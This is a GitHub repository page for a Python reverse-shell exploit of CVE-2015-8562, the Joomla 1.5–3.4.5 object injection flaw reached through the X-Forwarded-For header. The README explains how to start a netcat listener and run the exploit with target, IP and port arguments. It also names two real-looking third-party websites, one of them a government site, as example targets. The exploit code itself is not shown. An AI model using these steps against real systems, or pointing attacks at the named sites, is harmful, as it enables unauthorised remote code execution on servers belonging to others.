Skip to content

Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header

Notifications You must be signed in to change notification settings

colicrod/CVE-2015-8562

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

CVE-2015-8562 - Reverse shell python

Exploit: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header:

Vuln Date: 12/17/2015
Exploit Author: anarc0der
Version: Joomla 1.5 to 3.4.5
CVE : CVE-2015-8562

How to:

Open one terminal and listen with nc: $ nc -lnvp 4444
Open another terminal and execute the exploit:
python3 rce.py --target='target' --ip='ip' --port=4444

Targets examples PoC (Do not fuck them, to other people use as exemple):

http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/

About

Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%